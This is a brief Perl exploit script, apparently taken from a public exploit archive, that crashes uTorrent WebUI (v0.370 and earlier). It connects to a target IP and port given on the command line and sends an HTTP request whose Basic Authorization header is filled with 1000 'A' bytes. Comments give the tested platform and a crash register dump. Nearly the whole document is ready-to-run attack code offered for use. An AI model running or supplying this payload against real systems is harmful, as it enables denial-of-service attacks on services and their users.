#!/usr/bin/perl
# Exploit Title: uTorrent WebUI <= v0.370 Authorization header DoS Exploit
# Date: 2010-04-01
# Author: zombiefx darkernet[at]gmail.com<http://gmail.com>
# Version: µTorrent 2.0 (build 18488) / WebUI <=v0.370
# Tested on: Windows XP SP3
#Code:
# lame usage: ./UTweb.pl <IP> <PORT>
# EAX 00000000 ECX 00000000 EDX 00000001 EBX 003D8360 ASCII "admin" ESP 0141FE94
# EBP 0141FF08 ESI 00000000 EDI 01511958 EIP 0041BC62 uTorrent.0041BC62
# Good luck! corelanc0d3r
use warnings;
use strict;
use IO::Socket;
my $nonbase64 = "\x41" x 1000; # That was pointless
my $sock = IO::Socket::INET->new(PeerAddr =>$ARGV[0],PeerPort =>$ARGV[1],Proto => 'tcp');
print $sock "GET / HTTP/1.1\r\n".
"Authorization: Basic $nonbase64\r\n\r\n";